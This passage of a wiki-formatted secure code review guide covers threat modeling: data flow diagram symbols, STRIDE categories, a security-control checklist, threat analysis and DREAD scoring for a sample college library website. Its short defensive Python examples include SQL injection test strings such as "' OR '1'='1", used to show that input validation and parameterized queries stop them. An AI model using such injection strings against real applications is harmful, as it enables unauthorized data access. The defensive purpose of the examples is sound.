&amp;lt;td&amp;gt;7&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Web Server User Process&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;This is the process/user as which the web server executes code and authenticates itself to the database server.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;8&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Database Read User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The database user account used to access the database for read access.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;9&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Database Read/Write User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The database user account used to access the database for read and write access.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Data Flow Diagrams==&lt;br /&gt;
All of the information collected allows us to accurately model the application through the use of Data Flow Diagrams (DFDs). The DFDs will allow us to gain a better understanding of the application by providing a visual representation of how the application processes data. The focus of the DFDs is on how data moves through the application and what happens to the data as it moves. DFDs are hierarchical in structure, so they can be used to decompose the application into subsystems and lower-level subsystems. The high level DFD will allow us to clarify the scope of the application being modeled. The lower level iterations will allow us to focus on the specific processes involved when processing specific data. There are a number of symbols that are used in DFDs for threat modeling. These are described below:&lt;br /&gt;
&lt;br /&gt;
'''External Entity'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The external entity shape is used to represent any entity outside the application that interacts with the application via an entry point.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_external_entity.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Process'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The process shape represents a task that handles data within the application. The task may process the data or perform an action based on the data.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_process.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Multiple Process'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The multiple process shape is used to present a collection of subprocesses. The multiple process can be broken down into its subprocesses in another DFD.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_multiple_process.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Data Store'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The data store shape is used to represent locations where data is stored. Data stores do not modify the data, they only store data.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_data_store.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Data Flow'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The data flow shape represents data movement within the application. The direction of the data movement is represented by the arrow.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_data_flow.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
'''Privilege Boundary'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The privilege boundary shape is used to represent the change of privilege levels as the data flows through the application.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_privilge_boundary.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Example===&lt;br /&gt;
&amp;lt;br/&amp;gt; '''Data Flow Diagram for the College Library Website'''&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:Data flow1.jpg]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
'''User Login Data Flow Diagram for the College Library Website'''&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:Data flow2.jpg]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Determine and Rank Threats ==&lt;br /&gt;
===Threat Categorization===&lt;br /&gt;
The first step in the determination of threats is adopting a threat categorization. A threat categorization provides a set of threat categories with corresponding examples so that threats can be systematically identified in the application in a structured and repeatable manner. &lt;br /&gt;
&lt;br /&gt;
====STRIDE====&lt;br /&gt;
A threat categorization such as STRIDE is useful in the identification of threats by classifying attacker goals such as:&lt;br /&gt;
*Spoofing&lt;br /&gt;
*Tampering&lt;br /&gt;
*Repudiation&lt;br /&gt;
*Information Disclosure&lt;br /&gt;
*Denial of Service&lt;br /&gt;
*Elevation of Privilege.&lt;br /&gt;
&lt;br /&gt;
A threat list of generic threats organized in these categories with examples and the affected security controls is provided in the following table:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;STRIDE Threat List&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Type&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Examples&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Security Control&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Spoofing&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat action aimed to illegally access and use another user's credentials, such as username and password.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Authentication&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Tampering&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat action aimed to maliciously change/modify persistent data, such as persistent data in a database, and the alteration of data in transit between two computers over an open network, such as the Internet.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Integrity&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Repudiation&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat action aimed to perform illegal operations in a system that lacks the ability to trace the prohibited operations.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Non-Repudiation&amp;lt;/td&amp;gt; &lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Information disclosure&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat action to read a file that one was not granted access to, or to read data in transit. &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Confidentiality&amp;lt;/td&amp;gt; &lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Denial of service&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat aimed to deny access to valid users, such as by making a web server temporarily unavailable or unusable. &lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Availability&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Elevation of privilege&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Threat aimed to gain privileged access to resources for gaining unauthorized access to information or to compromise a system.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Authorization&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Security Controls==&lt;br /&gt;
Once the basic threat agents and business impacts are understood, the review team should try to identify the set of controls that could prevent these threat agents from causing those impacts.  The primary focus of the code review should be to ensure that these security controls are in place, that they work properly, and that they are correctly invoked in all the necessary places. The checklist below can help to ensure that all the likely risks have been considered.&lt;br /&gt;
&lt;br /&gt;
'''Authentication:'''&lt;br /&gt;
*Ensure all internal and external connections (user and entity) go through an appropriate and adequate form of authentication, and ensure that this control cannot be bypassed. &lt;br /&gt;
*Ensure all pages enforce the requirement for authentication. &lt;br /&gt;
*Ensure that whenever authentication credentials or any other sensitive information is passed, the application only accepts the information via the HTTP “POST” method and does not accept it via the HTTP “GET” method. &lt;br /&gt;
*Any page deemed by the business or the development team as being outside the scope of authentication should be reviewed in order to assess any possibility of security breach. &lt;br /&gt;
*Ensure that authentication credentials do not traverse the wire in clear text form. &lt;br /&gt;
*Ensure development/debug backdoors are not present in production code. &lt;br /&gt;
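Two of the checks above (POST-only credentials, no cleartext comparison shortcuts) can be illustrated with a minimal sketch. This is not OWASP's reference implementation; the function and parameter names are hypothetical, and in a real application the stored value would be a password hash rather than the password itself.

```python
# Hedged sketch: reject credentials sent via GET (query strings end up in logs
# and browser history) and compare secrets in constant time.
import hmac

def authenticate(method: str, supplied_password: str, stored_password: str) -> bool:
    # Credentials must arrive via the HTTP POST method, never GET.
    if method.upper() != "POST":
        return False
    # hmac.compare_digest avoids timing side channels in the comparison.
    # (Illustration only: real code compares password *hashes*, not plaintext.)
    return hmac.compare_digest(supplied_password.encode(), stored_password.encode())

print(authenticate("GET", "s3cret", "s3cret"))   # False: wrong method
print(authenticate("POST", "s3cret", "s3cret"))  # True
```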
&lt;br /&gt;
'''Authorization: '''&lt;br /&gt;
*Ensure that there are authorization mechanisms in place. &lt;br /&gt;
*Ensure that the application has clearly defined the user types and the rights of said users. &lt;br /&gt;
*Ensure there is a least privilege stance in operation. &lt;br /&gt;
*Ensure that the Authorization mechanisms work properly, fail securely, and cannot be circumvented. &lt;br /&gt;
*Ensure that authorization is checked on every request. &lt;br /&gt;
*Ensure development/debug backdoors are not present in production code. &lt;br /&gt;
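The "checked on every request", "least privilege", and "fail securely" points can be sketched as a decorator that denies by default. The role and permission names are invented for illustration; any real authorization model would be driven by the application's own user types.

```python
# Hedged sketch of a per-request authorization check with a default-deny stance.
from functools import wraps

# Hypothetical role-to-permission mapping (least privilege: only what is needed).
PERMISSIONS = {
    "librarian": {"create_user", "view_personal_data"},
    "student": {"view_catalog"},
}

def requires(permission):
    def decorator(fn):
        @wraps(fn)
        def wrapper(role, *args, **kwargs):
            # Fail securely: unknown roles resolve to an empty permission set.
            if permission not in PERMISSIONS.get(role, set()):
                raise PermissionError(f"{role} may not {permission}")
            return fn(role, *args, **kwargs)
        return wrapper
    return decorator

@requires("create_user")
def create_user(role, name):
    return f"created {name}"

print(create_user("librarian", "alice"))  # allowed
```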
&lt;br /&gt;
'''Cookie Management: '''&lt;br /&gt;
*Ensure that sensitive information is not compromised. &lt;br /&gt;
*Ensure that unauthorized activities cannot take place via cookie manipulation. &lt;br /&gt;
*Ensure that proper encryption is in use. &lt;br /&gt;
*Ensure secure flag is set to prevent accidental transmission over “the wire” in a non-secure manner. &lt;br /&gt;
*Determine if all state transitions in the application code properly check for the cookies and enforce their use. &lt;br /&gt;
*Ensure the session data is being validated. &lt;br /&gt;
*Ensure cookies contain as little private information as possible. &lt;br /&gt;
*Ensure entire cookie is encrypted if sensitive data is persisted in the cookie. &lt;br /&gt;
*Define all cookies being used by the application, their name, and why they are needed. &lt;br /&gt;
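The secure-flag item above can be shown concretely with the standard library's cookie support; setting HttpOnly alongside it is also common practice. The cookie name and value here are illustrative only.

```python
# Hedged sketch: mark a session cookie Secure (HTTPS only) and HttpOnly
# (not readable from script), and keep private data out of the value.
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session_id"] = "opaque-random-token"   # opaque ID, no private data
cookie["session_id"]["secure"] = True          # never sent over plain HTTP
cookie["session_id"]["httponly"] = True        # not exposed to JavaScript

header = cookie.output(header="Set-Cookie:")
print(header)
```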
&lt;br /&gt;
'''Data/Input Validation: '''&lt;br /&gt;
*Ensure that a data validation mechanism is present. &lt;br /&gt;
*Ensure all input that can (and will) be modified by a malicious user, such as HTTP headers, input fields, hidden fields, drop-down lists, and other web components, is properly validated. &lt;br /&gt;
*Ensure that the proper length checks on all input exist. &lt;br /&gt;
*Ensure that all fields, cookies, http headers/bodies, and form fields are validated. &lt;br /&gt;
*Ensure that the data is well formed and contains only known good chars if possible. &lt;br /&gt;
*Ensure that the data validation occurs on the server side. &lt;br /&gt;
*Examine where data validation occurs and if a centralized model or decentralized model is used. &lt;br /&gt;
*Ensure there are no backdoors in the data validation model. &lt;br /&gt;
*'''Golden Rule: All external input, no matter what it is, is examined and validated. '''&lt;br /&gt;
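The "known good chars" and length-check items amount to allow-list validation on the server side. A minimal sketch, assuming a hypothetical username field whose rules (letters, digits, underscore, 3-20 characters) are examples rather than a prescribed policy:

```python
# Hedged sketch: allow-list validation. Input is rejected, not "sanitized".
import re

# Known-good characters plus a bounded length, anchored to the whole string.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,20}$")

def valid_username(value: str) -> bool:
    # Runs on the server side; client-side checks alone can be bypassed.
    return bool(USERNAME_RE.fullmatch(value))

print(valid_username("kirsten_s"))       # True: matches the allow-list
print(valid_username("x' OR '1'='1"))    # False: quotes/spaces are not allowed
```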
&lt;br /&gt;
'''Error Handling/Information leakage: '''&lt;br /&gt;
*Ensure that all method/function calls that return a value have proper error handling and return value checking. &lt;br /&gt;
*Ensure that exceptions and error conditions are properly handled. &lt;br /&gt;
*Ensure that no system errors can be returned to the user. &lt;br /&gt;
*Ensure that the application fails in a secure manner. &lt;br /&gt;
*Ensure resources are released if an error occurs. &lt;br /&gt;
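The last three items (no system errors to the user, fail securely, release resources) fit naturally in a try/except/finally shape. The connection object and error text below are fabricated purely to make the sketch runnable.

```python
# Hedged sketch: return a generic message on failure and release the
# resource in `finally` on both the success and the error path.
def fetch_record(open_conn, record_id):
    conn = open_conn()
    try:
        return conn.lookup(record_id)
    except Exception:
        # Never leak system error details (stack traces, SQL text) to users.
        return "An internal error occurred. Please try again later."
    finally:
        conn.close()   # resource released whether or not an error occurred

# Fake connection used only to demonstrate the behavior.
class FakeConn:
    def __init__(self):
        self.closed = False
    def lookup(self, record_id):
        raise RuntimeError("ORA-00942: table or view does not exist")
    def close(self):
        self.closed = True

conn_holder = FakeConn()
msg = fetch_record(lambda: conn_holder, 7)
print(msg)                 # generic message, no database error details
print(conn_holder.closed)  # True
```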
&lt;br /&gt;
'''Logging/Auditing: '''&lt;br /&gt;
*Ensure that no sensitive information is logged in the event of an error. &lt;br /&gt;
*Ensure the payload being logged is of a defined maximum length and that the logging mechanism enforces that length. &lt;br /&gt;
*Ensure no sensitive data can be logged; e.g. cookies, HTTP “GET” method, authentication credentials. &lt;br /&gt;
*Examine if the application will audit the actions being taken by the application on behalf of the client (particularly data manipulation/Create, Update, Delete (CUD) operations). &lt;br /&gt;
*Ensure successful and unsuccessful authentication is logged. &lt;br /&gt;
*Ensure application errors are logged. &lt;br /&gt;
*Examine the application for debug logging with the view to logging of sensitive data. &lt;br /&gt;
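The length-enforcement and no-sensitive-data items above can be combined in one small logging helper. The field names treated as sensitive and the length limit are illustrative choices, not a standard.

```python
# Hedged sketch: redact sensitive fields and enforce a maximum logged
# payload length before anything reaches the log.
MAX_PAYLOAD = 64                                   # example limit
SENSITIVE = {"password", "cookie", "authorization"}  # example field names

def log_line(event: str, fields: dict) -> str:
    parts = [event]
    for key, value in fields.items():
        if key.lower() in SENSITIVE:
            value = "[REDACTED]"                   # credentials/cookies never logged
        parts.append(f"{key}={str(value)[:MAX_PAYLOAD]}")  # bounded length
    return " ".join(parts)

print(log_line("login_failed", {"user": "alice", "password": "hunter2"}))
```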
&lt;br /&gt;
'''Cryptography: '''&lt;br /&gt;
*Ensure no sensitive data is transmitted in the clear, internally or externally. &lt;br /&gt;
*Ensure the application is implementing known good cryptographic methods. &lt;br /&gt;
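"Known good cryptographic methods" means using vetted constructions rather than inventing a scheme. As one sketch, password storage with PBKDF2-HMAC-SHA256 from the standard library; the iteration count here is an example value to be tuned, not a recommendation.

```python
# Hedged sketch: salted PBKDF2 password hashing with constant-time verification.
import hashlib
import hmac
import os

ITERATIONS = 100_000  # example value; tune to your hardware and threat model

def hash_password(password, salt=None):
    salt = salt or os.urandom(16)                     # per-password random salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password, salt, digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)     # constant-time comparison

salt, digest = hash_password("correct horse")
print(verify_password("correct horse", salt, digest))  # True
print(verify_password("wrong", salt, digest))          # False
```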
&lt;br /&gt;
'''Secure Code Environment: '''&lt;br /&gt;
*Examine the file structure. Are any components that should not be directly accessible available to the user?&lt;br /&gt;
*Examine all memory allocations/de-allocations. &lt;br /&gt;
*Examine the application for dynamic SQL and determine if it is vulnerable to injection. &lt;br /&gt;
*Examine the application for “main()” executable functions and debug harnesses/backdoors.&lt;br /&gt;
*Search for commented-out code and commented-out test code, which may contain sensitive information. &lt;br /&gt;
*Ensure all logical decisions have a default clause. &lt;br /&gt;
*Ensure no development environment kit is contained in the build directories. &lt;br /&gt;
*Search for any calls to the underlying operating system or file open calls and examine the error possibilities. &lt;br /&gt;
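For the dynamic-SQL item above, the usual remedy is a parameterized query, so attacker-supplied input stays data and can never change the statement structure. A minimal sketch using Python's built-in sqlite3 driver with an invented table:

```python
# Hedged sketch: parameterized query instead of string-built dynamic SQL.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'librarian')")

def find_user(name):
    # The `?` placeholder binds `name` as data, never as SQL text.
    return conn.execute(
        "SELECT role FROM users WHERE name = ?", (name,)
    ).fetchall()

print(find_user("alice"))             # the real row
print(find_user("alice' OR '1'='1"))  # injection attempt matches nothing
```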
&lt;br /&gt;
'''Session Management: '''&lt;br /&gt;
*Examine how and when a session is created for a user, unauthenticated and authenticated. &lt;br /&gt;
*Examine the session ID and verify if it is complex enough to fulfill requirements regarding strength. &lt;br /&gt;
*Examine how sessions are stored: e.g. in a database, in memory etc. &lt;br /&gt;
*Examine how the application tracks sessions. &lt;br /&gt;
*Determine the actions the application takes if an invalid session ID occurs. &lt;br /&gt;
*Examine session invalidation. &lt;br /&gt;
*Determine how multithreaded/multi-user session management is performed. &lt;br /&gt;
*Determine the session HTTP inactivity timeout. &lt;br /&gt;
*Determine how the log-out functionality functions.&lt;br /&gt;
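Several of the items above (session ID strength, invalid-ID handling, inactivity timeout, invalidation) can be sketched together. The timeout value and in-memory store are illustrative assumptions; a real application might persist sessions in a database.

```python
# Hedged sketch: CSPRNG-generated session IDs with an inactivity timeout
# and explicit invalidation of stale or unknown IDs.
import secrets
import time

SESSION_TIMEOUT = 15 * 60   # example: 15 minutes of inactivity
sessions = {}               # in-memory store for illustration only

def create_session(user):
    sid = secrets.token_urlsafe(32)   # 256 bits from a CSPRNG, hard to guess
    sessions[sid] = {"user": user, "last_seen": time.time()}
    return sid

def get_session(sid):
    entry = sessions.get(sid)
    if entry is None or time.time() - entry["last_seen"] > SESSION_TIMEOUT:
        sessions.pop(sid, None)       # invalidate stale/unknown session IDs
        return None
    entry["last_seen"] = time.time()  # activity refreshes the timeout
    return entry

sid = create_session("alice")
print(get_session(sid)["user"])   # valid session resolves to its user
print(get_session("forged-id"))   # unknown ID is rejected
```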
&lt;br /&gt;
==Threat Analysis==&lt;br /&gt;
The prerequisite in the analysis of threats is an understanding of the generic definition of risk, that is, the probability that a threat agent will exploit a vulnerability to cause an impact to the application. From the perspective of risk management, threat modeling is the systematic and strategic approach for identifying and enumerating threats to an application environment, with the objective of minimizing risk and the associated impacts. &lt;br /&gt;
&lt;br /&gt;
Threat analysis as such is the identification of the threats to the application, and involves the analysis of each aspect of the application functionality and architecture and design to identify and classify potential weaknesses that could lead to an exploit. &lt;br /&gt;
&lt;br /&gt;
In the first threat modeling step, we have modeled the system showing data flows, trust boundaries, process components, and entry and exit points. An example of such modeling is shown in the Example: Data Flow Diagram for the College Library Website. &lt;br /&gt;
&lt;br /&gt;
Data flows show how data moves logically through the application end to end, and allow the identification of affected components through critical points (i.e. data entering or leaving the system, storage of data) and the flow of control through these components. Trust boundaries show any location where the level of trust changes. Process components show where data is processed, such as web servers, application servers, and database servers. Entry points show where data enters the system (i.e. input fields, methods) and exit points show where it leaves the system (i.e. dynamic output, methods). Entry and exit points define a trust boundary. &lt;br /&gt;
&lt;br /&gt;
Threat lists based on the STRIDE model are useful in identifying threats with regard to the attacker’s goals. For example, if the threat scenario is attacking the login, would the attacker brute force the password to break the authentication? If the threat scenario is to try to elevate privileges to gain another user’s privileges, would the attacker try to perform forceful browsing? &lt;br /&gt;
&lt;br /&gt;
It is vital that all possible attack vectors are evaluated from the attacker’s point of view. For this reason, it is also important to consider entry and exit points, since they could also allow the realization of certain kinds of threats. For example, the login page allows sending authentication credentials, and the input data accepted by an entry point has to be validated for potentially malicious input that exploits vulnerabilities such as SQL injection, cross-site scripting, and buffer overflows. Additionally, the data flow passing through that point has to be used to determine the threats to the entry points of the next components along the flow. If the following components can be regarded as critical (e.g. they hold sensitive data), that entry point can be regarded as more critical as well. In an end-to-end data flow, for example, the input data (i.e. username and password) from a login page, passed on without validation, could be exploited for a SQL injection attack to manipulate a query for breaking the authentication or to modify a table in the database. &lt;br /&gt;
&lt;br /&gt;
Exit points might serve as attack points to the client (e.g. XSS vulnerabilities) as well for the realization of information disclosure vulnerabilities. For example, in the case of exit points from components handling confidential data (e.g. data access components), exit points lacking security controls to protect the confidentiality and integrity can lead to disclosure of such confidential information to an unauthorized user. &lt;br /&gt;
&lt;br /&gt;
In many cases threats enabled by exit points are related to the threats of the corresponding entry point. In the login example, error messages returned to the user via the exit point might allow for entry point attacks, such as account harvesting (e.g. username not found), or SQL injection (e.g. SQL exception errors). &lt;br /&gt;
&lt;br /&gt;
From the defensive perspective, the identification of threats driven by a security control categorization such as ASF allows a threat analyst to focus on specific issues related to weaknesses (e.g. vulnerabilities) in security controls. Typically, the process of threat identification involves going through iterative cycles where initially all the possible threats in the threat list that apply to each component are evaluated. &lt;br /&gt;
&lt;br /&gt;
At the next iteration, threats are further analyzed by exploring the attack paths, the root causes (e.g. vulnerabilities, depicted as orange blocks) for the threat to be exploited, and the necessary mitigation controls (e.g. countermeasures, depicted as green blocks). A threat tree, as shown in Figure 2, is useful for performing such threat analysis. &lt;br /&gt;
&lt;br /&gt;
[[Image:Threat_Graph.gif|Figure 2: Threat Graph]]&lt;br /&gt;
&lt;br /&gt;
Once common threats, vulnerabilities, and attacks are assessed, a more focused threat analysis should take into consideration use and abuse cases. By thoroughly analyzing the use scenarios, weaknesses can be identified that could lead to the realization of a threat. Abuse cases should be identified as part of the security requirement engineering activity. These abuse cases can illustrate how existing protective measures could be bypassed, or where a lack of such protection exists. A use and misuse case graph for authentication is shown in the figure below:&lt;br /&gt;
&lt;br /&gt;
[[Image:UseAndMisuseCase.jpg|Figure 3: Use and Misuse Case]]&lt;br /&gt;
&lt;br /&gt;
Finally, it is possible to bring all of this together by determining the types of threat to each component of the decomposed system. This can be done by using a threat categorization such as STRIDE or ASF, the use of threat trees to determine how the threat can be exposed by a vulnerability, and use and misuse cases to further validate the lack of a countermeasure to mitigate the threat.&lt;br /&gt;
&lt;br /&gt;
To apply STRIDE to the data flow diagram items, the following table can be used: &lt;br /&gt;
&lt;br /&gt;
TABLE&lt;br /&gt;
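The placeholder above refers to a mapping of STRIDE threat categories to DFD element types. As a hedged illustration (based on the per-element mapping commonly published in Microsoft's threat modeling guidance, not reproduced from this guide), that mapping can be expressed as a small lookup table:&lt;br /&gt;

```python
# Sketch of the commonly cited STRIDE-per-element mapping (an assumption
# based on Microsoft's threat modeling guidance; the original table is
# not present in this text).
STRIDE_BY_ELEMENT = {
    "External Entity": {"S", "R"},                      # Spoofing, Repudiation
    "Process":         {"S", "T", "R", "I", "D", "E"},  # all six categories
    "Data Store":      {"T", "R", "I", "D"},            # Tampering, Repudiation, Info disclosure, DoS
    "Data Flow":       {"T", "I", "D"},                 # Tampering, Info disclosure, DoS
}

def applicable_threats(element_type: str) -> set:
    """Return the STRIDE categories that apply to a given DFD element type."""
    return STRIDE_BY_ELEMENT.get(element_type, set())
```

Each DFD element identified in step 1 can then be checked against the categories returned for its type.&lt;br /&gt;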
&lt;br /&gt;
==Ranking of Threats==&lt;br /&gt;
Threats can be ranked from the perspective of risk factors. By determining the risk factor posed by the various identified threats, it is possible to create a prioritized list of threats to support a risk mitigation strategy, such as deciding which threats have to be mitigated first. Different risk factors can be used to determine which threats can be ranked as High, Medium, or Low risk. In general, threat risk models use different factors to model risks, such as those shown in the figure below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:Riskfactors.JPG|Figure 4: Risk Model Factors]]&lt;br /&gt;
&lt;br /&gt;
==DREAD==&lt;br /&gt;
In the Microsoft DREAD threat-risk ranking model, the technical risk factors for impact are Damage and Affected Users, while the ease of exploitation factors are Reproducibility, Exploitability and Discoverability. This risk factorization allows the assignment of values to the different influencing factors of a threat. To determine the ranking of a threat, the threat analyst has to answer basic questions for each factor of risk, for example: &lt;br /&gt;
&lt;br /&gt;
*For Damage: How big can the damage be?&lt;br /&gt;
*For Reproducibility: How easy is it to reproduce the attack?&lt;br /&gt;
*For Exploitability: How much time, effort, and expertise is needed to exploit the threat?&lt;br /&gt;
*For Affected Users: If a threat were exploited, what percentage of users would be affected?&lt;br /&gt;
*For Discoverability: How easy is it for an attacker to discover this threat?&lt;br /&gt;
&lt;br /&gt;
By referring to the college library website, it is possible to document sample threats related to the use cases, such as: &lt;br /&gt;
&lt;br /&gt;
'''Threat: Malicious user views confidential information of students, faculty members and librarians.'''&lt;br /&gt;
# '''Damage potential:''' Threat to reputation as well as financial and legal liability:8&lt;br /&gt;
# '''Reproducibility:'''  Fully reproducible:10&lt;br /&gt;
# '''Exploitability:'''   Requires being on the same subnet or having compromised a router:7&lt;br /&gt;
# '''Affected users:'''   Affects all users:10&lt;br /&gt;
# '''Discoverability:'''  Can be found out easily:10&lt;br /&gt;
&lt;br /&gt;
Overall DREAD score: (8+10+7+10+10) / 5 = 9&lt;br /&gt;
&lt;br /&gt;
In this case, scoring 9 on a 10-point scale certainly makes this a high-risk threat.&lt;br /&gt;
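The arithmetic above can be sketched as a small helper, assuming each of the five DREAD factors is rated on a 0-10 scale as in the example:&lt;br /&gt;

```python
def dread_score(damage, reproducibility, exploitability,
                affected_users, discoverability):
    """Average the five DREAD factors (each rated 0-10) into one risk score."""
    factors = [damage, reproducibility, exploitability,
               affected_users, discoverability]
    return sum(factors) / len(factors)

# The college library threat rated above: (8+10+7+10+10) / 5
score = dread_score(8, 10, 7, 10, 10)  # -> 9.0
```

A team would rate each identified threat this way and then sort the threats by score to prioritize mitigation.&lt;br /&gt;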
&lt;br /&gt;
==Generic Risk Model==&lt;br /&gt;
A more generic risk model takes into consideration the Likelihood (e.g. probability of an attack) and the Impact (e.g. damage potential): &lt;br /&gt;
&lt;br /&gt;
'''Risk = Likelihood x Impact'''&lt;br /&gt;
&lt;br /&gt;
The likelihood or probability is defined by the ease of exploitation, which mainly depends on the type of threat and the system characteristics, and by the possibility of realizing the threat, which is determined by the existence of an appropriate countermeasure.  &lt;br /&gt;
&lt;br /&gt;
